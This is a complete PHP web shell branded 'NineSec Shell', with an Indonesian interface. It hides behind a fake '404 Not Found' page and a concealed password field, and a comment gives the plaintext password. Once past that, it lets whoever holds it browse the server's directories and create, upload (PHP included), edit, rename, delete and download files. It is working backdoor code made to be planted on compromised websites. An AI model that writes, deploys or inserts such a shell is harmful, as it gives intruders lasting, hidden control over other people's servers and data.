<?php
session_start();
error_reporting(0);
$get_url = "https://" . $_SERVER["HTTP_HOST"] . $_SERVER['PHP_SELF'];
$version = $_SERVER["HTTP_USER_AGENT"];
$user_pass = '$2y$10$9WKzhOKTZapBq41iE5JcW.7V0XbMbWLvlzYTUID6i2AHi7Fhli.Je'; // keyboardrbg
if (isset($_POST['buttonpass'])) {
    $pw = $_POST['password'];
    if (password_verify($pw, $user_pass)) {
        $_SESSION['cicakshell'] = True;
        header('Location: remove.php');
    }
}
if (!isset($_SESSION['cicakshell'])) {
    echo '<!DOCTYPE HTML>
    <html>
    
    <head>
        <title>404 Not Found</title>
    </head>
    
    <body>
        <h1>Not Found</h1>
        <p>The requested URL ' . $get_url . '</p>
        <hr>
        <address>' . $version . '</address>
        <form action="" method="post">
            <input type="password" name="password" autocomplate="off" style="border:1px solid white;">
            <button type="submit" name="buttonpass" style="border:1px solid white; display: none;"></button>
        </form>
    </body>
    
    </html>';
    exit();
}

function logout()
{
    $_SESSION = [];
    session_unset();
    session_destroy();
    header('Location: index.php');
}
if (isset($_POST['logout'])) {
    logout();
}

?>
<!doctype html>
<html lang="en">

<head>
    <!-- Required meta tags -->
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">

    <!-- Bootstrap CSS -->
    <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/bootstrap@4.3.1/dist/css/bootstrap.min.css" integrity="sha384-ggOyR0iXCbMQv3Xipma34MD+dH/1fQ784/j6cY/iJTQUOhcWr7x9JvoRxT2MZw1T" crossorigin="anonymous">
    <link rel="shortcut icon" type="image/png" href="https://j.top4top.io/p_2272656q50.png">

    <title>NineSec Shell</title>
</head>

<body class="">
    <!-- Image and text -->
    <nav class="navbar navbar-dark bg-dark">
        <a class="navbar-brand" href="#">
            <div class="container">
                <img src="https://j.top4top.io/p_2272656q50.png" width="30" height="30" class="d-inline-block align-top" alt="">
                NineSec Shell
            </div>
        </a>

        <!--  -->
        <form action="" method="post">
            <button type="submit" name="createfile" class="btn btn-outline-warning text-right">Buat File</button>
            <button type="submit" name="logout" class="btn btn-outline-success text-right">Logout</button>
        </form>
    </nav>
    <div class="container">
        <div class="mt-3">
            <?php
            echo '> Direktori saat ini : ';
            if (isset($_GET['dir'])) {
                $dirs = $_GET['dir'];
            } else {
                $dirs = getcwd();
            }
            $dirr = str_replace("\\", "/", $dirs);
            $dir = explode("/", $dirr);
            foreach ($dir as $d => $value) {
                if ($value == '' && $d == 0) {
                    echo '<a href="?dir=/">/</a>';
                    continue;
                }
                echo '<a href="?dir=';
                for ($i = 0; $i <= $d; $i++) {
                    echo "$dir[$i]";
                    if ($i !== $d) echo '/';
                }
                echo '">' . $value . '/</a>';
            }
            echo "<br>";
            ?>

            <!-- create file -->
            <?php
            if (isset($_POST['savefile'])) {
                $data = [
                    'filename' => htmlspecialchars($_POST['titlefile']),
                    'isifile' => htmlspecialchars($_POST['isi'])
                ];
                $dirsa = str_replace('\\', '/', $dirs);
                $a = $_POST['current_path'] . '/' . $data['filename'];
                $file = fopen($a, 'w');
                if (fwrite($file, $data['isifile'])) {
                    echo '<script>alert("Berhasil menyimpan file");</script>';
                    header('Location: remove.php?dir=' . $_POST['current_path']);
                } else {
                    echo '<script>alert("Gagal menyimpan file");</script>';
                    header('Location: remove.php?dir=' . $_POST['current_path']);
                }
                fclose($file);
            }
            if (isset($_POST['createfile'])) {
                echo '<div class="row mt-3">
                <div class="col">
                    <form action="remove.php" method="post">
                        <label for="titlefile">Nama File</label>
                        <input type="hidden" name="current_path" value="' . $dirs . '">
                        <input type="text" name="titlefile" class="form-control" autofocus="on">
                        <label for="isi">Isi File</label>
                        <textarea type="text" name="isi" cols="50" rows="10" class="form-control"></textarea>
                        <button class="btn btn-success btn-sm mt-3" type="submit" name="savefile">Simpan</button>
                    </form>
                </div>
            </div>';
                exit();
            }
            ?>

            <!-- end create file -->

            <!-- upload -->
            <?php
            if (isset($_POST['submit_upload_file'])) {
                $path_save = $_POST['path_save'] . '/';
                $data = [
                    'file' => $_FILES['file'],
                    'nama' => $_FILES['file']['name'],
                    'type' => $_FILES['file']['type'],
                    'error' => $_FILES['file']['error'],
                    'size' => $_FILES['file']['size'],
                    'tmp_path' => $_FILES['file']['tmp_name']
                ];
                if ($data['size'] > 300000000) {
                    echo '<script>alert("File terlalu besar");</script>';
                }
                $allow_ekstensi = ['jpg', 'png', 'txt', 'php', 'js', 'html', 'css', 'js'];
                $ekstensi = explode('.', $data['nama']);
                $ekstensi = strtolower(end($ekstensi));
                if (!in_array($ekstensi, $allow_ekstensi)) {
                    echo '<script>alert("Ekstensi file tidak valid");</script>';
                }
                if ($data['error']) {
                    echo $data['error'];
                    exit;
                }

                $uploaded = move_uploaded_file($data['tmp_path'], $path_save . $data['nama']);
                if ($uploaded) {
                    echo '<script>alert("File berhasil di upload");</script>';
                    header('Location: remove.php?dir=' . $_POST['path_save']);
                } else {
                    echo '<script>alert("File gagal di upload");</script>';
                    header('Location: remove.php?dir=' . $_POST['path_save']);
                }
            }
            ?>


            <form action="" method="post" enctype="multipart/form-data">
                <div class="input-group mt-3">
                    <div class="custom-file">
                        <input type="hidden" name="path_save" value="<?= $_GET['dir']; ?>">
                        <input type="file" class="custom-file-input" id="file" name="file">
                        <label class="custom-file-label" for="file">Pilih File</label>
                    </div>
                    <div class="input-group-append">
                        <button class="btn btn-outline-success" type="submit" id="submit_upload_file" name="submit_upload_file">Upload</button>
                    </div>
                </div>
            </form>

            <!-- end upload -->

            <!-- edit -->
            <div class="mt-3">
                <?php
                if (isset($_GET['edit'])) {
                    echo '<form action="remove.php" method="post">
                    <input type="hidden" name="current_path" value="' . $_GET['current_path'] . '"></input>
                    <input type="hidden" name="object" value="' . $_GET['edit'] . '"></input>
                    <textarea name="edit" id="edit_isi" cols="50" rows="10" class="form-control">
                    ' . htmlspecialchars(file_get_contents($_GET["edit"])) . '
                    </textarea>
                    <button type="submit" name="GO" class="btn btn-info btn-lg btn-block mt-3">Update</button>
                </form>';
                    exit;
                }
                if (isset($_POST['GO'])) {
                    $file = fopen($_POST['object'], 'w');
                    if (fwrite($file, $_POST['edit'])) {
                        echo '<script>alert("Data berhasil di edit");</script>';
                        header('Location: remove.php?dir=' . $_POST['current_path']);
                    } else {
                        echo '<script>alert("Data gagal di edit");</script>';
                        header('Location: remove.php?dir=' . $_POST['current_path   ']);
                    }
                }
                ?>
            </div>

            <!-- end edit -->
            <?php
            if (isset($_GET['rename'])) {
                echo '<form action="remove.php" method="post">
                <p>Rename File</p>
                <input type="hidden" value="' . $_GET['dir'] . '" name="current_path">
                <input type="text" value="' . $_GET['rename'] . '" class="form-control mb-3" disabled>
                <input type="hidden" name="oldname" value="' . $_GET['rename'] . '">
                <input type="text" name="newname" class="form-control" placeholder="New Name ...">
                <button class="btn btn-info btn-sm mt-3" type="submit" name="go_rename">Rename</button>
            </form>';
                exit();
            }
            if (isset($_POST['go_rename'])) {
                $current_path = str_replace('\\', '/', $_POST['current_path']);
                $rename = rename($_POST['oldname'], $_POST['newname']);
                if ($rename) {
                    echo "<script>alert('Data berhasil di rename');</script>";
                    header('Location: remove.php?dir=' . $current_path);
                } else {
                    echo "<script>alert('Data gagal di rename');</script>";
                    header('Location: remove.php?dir=' . $current_path);
                }
            }
            ?>
            <!-- delete -->
            <?php
            if (isset($_GET['delete'])) {
                if (unlink($_GET['delete'])) {
                    echo '<script>alert("Data berhasil di hapus");</script>';
                    header('Location: remove.php?dir=' . $_GET['current_path']);
                } else {
                    echo '<script>alert("Data gagal di hapus");</script>';
                    header('Location: remove.php?dir=' . $_GET['current_path']);
                }
            }
            ?>
            <!-- end delete -->
            <!-- rename -->

            <!-- end rename -->
            <div class="table-responsive-md">
                <table class="table table-hover mt-3">
                    <thead class="thead-dark">
                        <tr>
                            <th>No</th>
                            <th>File</th>
                            <th>Izin</th>
                            <th>Size</th>
                            <th>Aksi</th>
                            <th>Opsi</th>
                        </tr>
                    </thead>
                    <tbody>
                        <?php
                        if ($open = opendir($dirr)) {
                            $i = 1;
                            while (($isidir = readdir($open)) !== false) {
                                if ($isidir !== '.' && $isidir !== '..') {
                        ?>
                                    <tr>
                                        <th><?= $i++; ?></th>
                                        <td>
                                            <?php if (is_dir($isidir)) {
                                                echo '<a href="?dir=' . $dirs . '/' . $isidir . '">' . $isidir . '</a>';
                                            } else {
                                                echo '<p>' . $isidir . '</p>';
                                            } ?>
                                        </td>
                                        <td>-rwxrwxrwx</td>
                                        <td>
                                            <?= filesize($isidir); ?> Byte
                                        </td>
                                        <td>
                                            <a class="btn btn-danger btn-sm" href="?delete=<?= $dirs . '/' . $isidir; ?>&current_path=<?= $dirs; ?>">hapus</a>
                                            <a class="btn btn-warning btn-sm" href="?edit=<?= $dirs . '/' . $isidir; ?>&current_path=<?= $dirs; ?>">Update</a>
                                        </td>
                                        <td>
                                            <a href="?rename=<?= $isidir; ?>&dir=<?= $dirs; ?>" class="btn btn-info btn-sm">Rename</a>
                                            <a href="<?= $isidir; ?>" class="btn btn-info btn-sm" download="">Download</a>
                                        </td>
                                    </tr>
                        <?php
                                }
                            }
                        }
                        ?>
                    </tbody>
                </table>
            </div>
        </div>

    </div>

    <script src="https://code.jquery.com/jquery-3.3.1.slim.min.js" integrity="sha384-q8i/X+965DzO0rT7abK41JStQIAqVgRVzpbzo5smXKp4YfRvH+8abtTE1Pi6jizo" crossorigin="anonymous"></script>
    <script src="https://cdn.jsdelivr.net/npm/popper.js@1.14.7/dist/umd/popper.min.js" integrity="sha384-UO2eT0CpHqdSJQ6hJty5KVphtPhzWj9WO1clHTMGa3JDZwrnQq4sF86dIHNDz0W1" crossorigin="anonymous"></script>
    <script src="https://cdn.jsdelivr.net/npm/bootstrap@4.3.1/dist/js/bootstrap.min.js" integrity="sha384-JjSmVgyd0p3pXB1rRibZUAYoIIy6OrQ6VrjIEaFf/nJGzIxFDsf4x0xIM+B07jRM" crossorigin="anonymous"></script>
</body>
<div class="container">
    <footer class="main-footer">
        <div class="float-right d-none d-sm-inline">
            made by cicak9sec
        </div>
        <strong>Copyright &copy; <?= date('Y'); ?>.</strong> NineSec.
    </footer>
</div>


</html>